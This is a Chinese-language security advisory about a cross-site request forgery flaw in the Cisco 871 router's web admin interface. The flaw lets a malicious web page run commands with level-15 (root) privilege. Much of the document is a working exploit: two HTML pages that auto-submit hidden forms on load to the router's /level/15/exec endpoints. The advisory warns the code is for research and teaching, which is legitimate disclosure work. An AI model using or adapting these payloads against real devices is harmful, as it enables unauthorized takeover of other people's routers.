Cisco 871 Integrated Services Router描述:
BUGTRAQ ID: 31218
Cisco 871集成服务路由器是一款小型的宽带无线路由器。
Cisco 871路由器的HTTP管理接口存在跨站请求伪造漏洞,如果用户受骗查看了嵌有恶意代码的网页的话,就会导致在路由器上以15级权限(root)执行任意命令。
<*来源:Jeremy Brown
链接:http://jbrownsec.blogspot.com/2008/09/cisco-0day-released.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<body>
<body onload="asdf.submit();">
<form name=asdf method="post" action="http://10.10.10.1/level/15/exec/-">
<input type=hidden name=command value="show privilege">
<input type=hidden name=command_url value="/level/15/exec/-">
</body>
</html>
<html>
<body>
<body onload="fdsa.submit();">
<form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http">
<input type=hidden name=command value="alias exec xx xx">
<input type=hidden name=command_url value="/level/15/exec/-">
<input type=hidden name=new_command_url value="/level/15/configure/-">
</body>
</html>
建议:
厂商补丁:
Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cisco.com/warp/public/707/advisory.html